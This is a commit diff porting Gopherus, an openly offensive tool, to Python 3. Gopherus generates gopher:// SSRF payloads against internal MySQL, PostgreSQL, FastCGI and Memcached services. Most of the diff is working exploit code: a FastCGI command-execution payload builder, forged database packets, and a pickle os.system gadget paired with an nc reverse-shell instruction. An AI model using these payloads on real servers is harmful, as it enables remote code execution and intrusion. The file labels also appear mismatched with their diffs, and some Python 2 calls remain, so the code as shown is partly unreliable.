Updated python code

Author: Antabuse-does-something

.gitignore

@@ -1 +1,2 @@
 *.pyc
+__pycache__

README.md

@@ -1,6 +1,11 @@
 # Gopherus
 If you know a place which is SSRF vulnerable then, this tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). And also it will help you to get the Reverse shell on the victim server. And for more 
 information you can get a blog on the same [Blog on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
+
+## Note :
+
+This repo is a fork from the Original Tool but I have updated the code from python2 to python3 and added a new feature to select the port for the reverse shell(Redis).
+
 ## About
 This tool can generate payload for following:
 1.  MySQL     (Port-3306)

gopherus.py

@@ -0,0 +1,68 @@
+#!/usr/bin/python
+import argparse
+from ast import match_case
+import sys
+sys.path.insert(0, './scripts/')
+from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix
+
+
+class colors:
+    reset='\033[0m'
+    red='\033[31m'
+    green='\033[32m'
+    orange='\033[33m'
+    blue='\033[34m'
+
+
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--exploit",
+                        help="mysql,\n"
+                             "postgresql,\n"
+                             "fastcgi,\n"
+                             "redis,\n"
+                             "smtp,\n"
+                             "zabbix,\n"
+                             "pymemcache,\n"
+                             "rbmemcache,\n"
+                             "phpmemcache,\n"
+                             "dmpmemcache")
+    args = parser.parse_args()
+    print(colors.green + """
+      ________              .__                                ________  
+     /  _____/  ____ ______ |  |__   ___________ __ __  ______ \_____  \ 
+    /   \  ___ /  _ \\\\____ \|  |  \_/ __ \_  __ \  |  \/  ___/   _(__  < 
+    \    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \\   /       \\
+     \______  /\____/|   __/|___|  /\___  >__|  |____//____  > /______  /
+            \/       |__|        \/     \/                 \/         \/ 
+    """+ "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset)
+
+    if(not args.exploit):
+        print(parser.print_help())
+        sys.exit(1)
+    
+    if(args.exploit=="mysql"):
+        MySQL.MySQL()
+    elif(args.exploit=="postgresql"):
+        PostgreSQL.PostgreSQL()
+    elif(args.exploit=="fastcgi"):
+        FastCGI.FastCGI()
+    elif(args.exploit=="redis"):
+        Redis.Redis()
+    elif(args.exploit=="smtp"):
+        SMTP.SMTP()
+    elif(args.exploit=="zabbix"):
+        Zabbix.Zabbix()
+    elif(args.exploit=="dmpmemcache"):
+        DumpMemcached.DumpMemcached()
+    elif(args.exploit=="phpmemcache"):
+        PHPMemcached.PHPMemcached()
+    elif(args.exploit=="rbmemcache"):
+        RbMemcached.RbMemcached()
+    elif(args.exploit=="pymemcache"):
+        PyMemcached.PyMemcached()
+    else:
+        print(parser.print_help())
+
+if __name__ == "__main__":
+    main()

gopherus3.py

@@ -1,5 +1,5 @@
 #!/bin/bash
-pip2 install argparse
-pip2 install requests
-chmod +x gopherus.py
-ln -sf $(pwd)/gopherus.py /usr/local/bin/gopherus
+pip3 install -r requirements.txt
+chmod +x gopherus3.py
+sudo ln -sf $(pwd)/gopherus3.py /usr/local/bin/gopherus3
+echo "Gopherus3 installed"

install.sh

@@ -0,0 +1,2 @@
+argparse
+requests

requirements.txt

@@ -1,12 +1,12 @@
-import urllib
+import urllib.parse
 
 def DumpMemcached():
-    code = raw_input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m")
+    code = input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m")
 
-    payload = urllib.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+    payload = urllib.parse.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
 
     finalpayload = "gopher://127.0.0.1:11211/_%0d%0a" + payload + "%0d%0a"
 
-    print "\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m"
-    print finalpayload
-    print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m"
+    print("\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m")
+    print(finalpayload)
+    print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m")

scripts/DumpMemcached.py

@@ -1,12 +1,12 @@
-import urllib
+import urllib.parse
 
 def FastCGI():
-    filename = raw_input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one:  "+ "\033[0m")
+    filename = input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one:  "+ "\033[0m")
 
     if(not filename):
         filename="/usr/share/php/PEAR.php"
 
-    command=raw_input("\033[96m" +"Terminal command to run:  "+ "\033[0m")
+    command=input("\033[96m" +"Terminal command to run:  "+ "\033[0m")
     length=len(command)+52
     char=chr(length)
 
@@ -25,10 +25,11 @@ def FastCGI():
 
     payload = start + data + end
 
-    def get_payload(payload):
-        finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/")
-        return "gopher://127.0.0.1:9000/_" + finalpayload
+    print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m")
+    print("\033[04m" + get_payload(payload)+ "\033[0m")
+    print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
 
-    print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m"
-    print "\033[04m" + get_payload(payload)+ "\033[0m"
-    print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+
+def get_payload(payload):
+    finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/")
+    return "gopher://127.0.0.1:9000/_" + finalpayload

scripts/FastCGI.py

@@ -1,7 +1,6 @@
-
 def MySQL():
-    print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m"
-    user = raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m")
+    print("\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m")
+    user = input("\033[96m" +"\nGive MySQL username: " + "\033[0m")
     encode_user = user.encode("hex")
     user_length = len(user)
     temp = user_length - 4
@@ -13,26 +12,26 @@ def MySQL():
     dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
     dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"
 
-    query = raw_input("\033[96m" +"Give query to execute: "+ "\033[0m")
+    query = input("\033[96m" +"Give query to execute: "+ "\033[0m")
 
     auth = dump.replace("\n","")
 
-    def encode(s):
-        a = [s[i:i + 2] for i in range(0, len(s), 2)]
-        return "gopher://127.0.0.1:3306/_%" + "%".join(a)
-
-
-    def get_payload(query):
-        if(query.strip()!=''):
-            query = query.encode("hex")
-            query_length = '{:06x}'.format((int((len(query) / 2) + 1)))
-            query_length = query_length.decode('hex')[::-1].encode('hex')
-            pay1 = query_length + "0003" + query
-            final = encode(auth + pay1 + "0100000001")
-            return final
-        else:
-            return encode(auth)
-
-    print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
-    print "\033[04m" + get_payload(query)+ "\033[0m"
-    print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+    print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+    print("\033[04m" + get_payload(query,auth)+ "\033[0m")
+    print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
+
+
+def encode(s):
+    a = [s[i:i + 2] for i in range(0, len(s), 2)]
+    return "gopher://127.0.0.1:3306/_%" + "%".join(a)
+
+def get_payload(query,auth):
+    if(query.strip()!=''):
+        query = query.encode("hex")
+        query_length = '{:06x}'.format((int((len(query) / 2) + 1)))
+        query_length = query_length.decode('hex')[::-1].encode('hex')
+        pay1 = query_length + "0003" + query
+        final = encode(auth + pay1 + "0100000001")
+        return final
+    else:
+        return encode(auth)

scripts/MySQL.py

@@ -1,20 +1,20 @@
-import urllib
+import urllib.parse
 
 def PHPMemcached():
-    print "\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m"
+    print("\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m")
 
-    code = raw_input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{}   : "+ "\033[0m")
+    code = input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{}   : "+ "\033[0m")
 
     if(not code):
-        print "\033[93m" + "Plz give payload" + "\033[0m"
+        print("\033[93m" + "Plz give payload" + "\033[0m")
         exit()
 
     payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" +  code + "%0d%0a"
 
-    finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+    finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
 
-    print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
-    print "\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m"
-    print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m"
-    print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m"
-    print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+    print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+    print("\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m")
+    print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m")
+    print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m")
+    print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")

scripts/PHPMemcached.py

@@ -1,7 +1,7 @@
 def PostgreSQL():
-	user = raw_input("\033[96m" + "PostgreSQL Username: " + "\033[0m")
-	db = raw_input("\033[96m" + "Database Name: " + "\033[0m")
-	query = raw_input("\033[96m" + "Query: " + "\033[0m")
+	user = input("\033[96m" + "PostgreSQL Username: " + "\033[0m")
+	db = input("\033[96m" + "Database Name: " + "\033[0m")
+	query = input("\033[96m" + "Query: " + "\033[0m")
 
 	encode_user = user.encode("hex")
 	encode_db = db.encode("hex")
@@ -16,11 +16,13 @@ def PostgreSQL():
 
 	packet = start + data + end
 
-	def encode(s):
-		a = [s[i:i + 2] for i in range(0, len(s), 2)]
-	        return "gopher://127.0.0.1:5432/_%" + "%".join(a)
 
 
-	print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
-	print "\033[04m" + encode(packet) + "\033[0m"
-	print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+
+	print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+	print("\033[04m" + encode(packet) + "\033[0m")
+	print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
+
+def encode(s):
+	a = [s[i:i + 2] for i in range(0, len(s), 2)]
+	return "gopher://127.0.0.1:5432/_%" + "%".join(a)

scripts/PostgreSQL.py

@@ -1,10 +1,10 @@
-import cPickle
+import pickle
 import os
-import urllib
+import urllib.parse
 
 def PyMemcached():
-    print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m"
-    server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m")
+    print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m")
+    server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m")
 
     if(not server):
         server = "127.0.0.1"
@@ -16,18 +16,18 @@ def __reduce__(self):
             if(cmd):
                 return (os.system,(cmd,))
 
-    command = (cPickle.dumps(PickleRCE()))
+    command = (pickle.dumps(PickleRCE()))
 
-    def get_payload(command):
-        payload = urllib.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
-        finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" +  payload + "%0d%0a"
-        return finalpayload
+    print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m")
+    print("\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m")
 
-    print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m"
-    print "\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m"
+    print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m")
 
-    print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m"
+    print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m")
+    print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m")
+    print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
 
-    print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m"
-    print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m"
-    print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+def get_payload(command):
+        payload = urllib.parse.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+        finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" +  payload + "%0d%0a"
+        return finalpayload